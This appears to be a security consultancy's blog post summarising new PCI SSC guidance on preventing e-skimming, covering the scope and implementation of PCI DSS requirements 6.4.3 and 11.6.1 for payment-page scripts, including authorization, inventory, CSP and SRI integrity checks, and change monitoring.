The PCI Security Standards Council (PCI SSC) has published a new guide: “Payment Page Security and Preventing E-Skimming - Guidance for PCI DSS Requirements 6.4.3 and 11.6.1”. This document provides merchants and service providers with guidance on implementing controls to protect payment card data in e-commerce transactions.
E-skimming - a growing threat
E-skimming is an ever-increasing threat to the security of credit card data.
To mitigate this risk as effectively as possible, the security of scripts used to process payments must be well managed and monitored.
For this very purpose, the PCI SSC has introduced the new requirements 6.4.3 and 11.6.1 as future-dated requirements with version 4.0 of the PCI DSS:
Requirement 6.4.3 contains specifications for securing all scripts integrated on payment pages, including those obtained from third parties.
Requirement 11.6.1 stipulates that mechanisms for recognizing changes and manipulations on payment pages be introduced.
Concrete guidance for affected companies
The E-Commerce Guidance Task Force, which was responsible for the development of the document, consisted of members of the PCI SSC, representatives of payment brands, members of the Board of Advisors/Technical Advisory Board, members of the Global Executive Assessor Roundtable (GEAR) and members of the Small Merchant Business (SMB) Task Force.
Our colleague Hendrik Diederich, Senior Security Consultant and PCI Auditor, contributed to the new guidance as a member of the E-Commerce Guidance Task Force.
As security experts and auditors, we naturally see the growing risk of e-skimming and therefore also the need for the two new requirements. However, we also are also aware of the challenge that implementing the requirements poses for many companies. With the task force's new guidance, we want to provide them with concrete assistance.
What our expert recommends
There are two areas that are addressed in the new guidelines, among others, that our expert believes are of particular interest to companies: scoping and implementation.
Scoping: Who must fulfill requirements 6.4.3 and 11.6.1?
- In the new version of the SAQ A, both requirements have been removed and replaced by a new Eligibility Criteria for the application of the SAQ A as a form of verification.
(You can find more information on this in our news blog: https://www.usd.de/en/update-pci-saq-a-2025/) - The requirements apply to all scripts that are involved in processing payments, for example by direct post.
- The requirements also apply to all scripts that running on the website where the payment is made.
- If a redirect to a payment service provider is performed using a script, this script is also in scope.
Implementation: How can companies meet the requirements?
Requirement 6.4.3:
- Authorization: A person can be named and documented who is authorized to approve the use of a script (for example, as part of the development process).
- Inventory: Every script used must be documented - including the reason why it is needed.
- Integrity: CSP, SRI or proxy-based solutions can be used to ensure integrity.
Requirement 11.6.1:
- The following components and aspects of the website on which payments are made should be monitored:
- Headers with a potential security impact on the security of payment pages
- Changes to script contents
- Indicators that the script content has been compromised
- There must be a system for alerting if a compromise is detected. This can be established using CSP report-to, proxy-based solutions or the existing monitoring solution.
- Frequency: every 7 days or based on the Targeted Risk Analysis (TRA)
(You can find more information on TRA in our news blog: https://www.usd.de/en/targeted-risk-analysis-pci-dss/)
Do you need help preparing for or implementing PCI DSS in your company? Get in touch – our experts are happy to help.
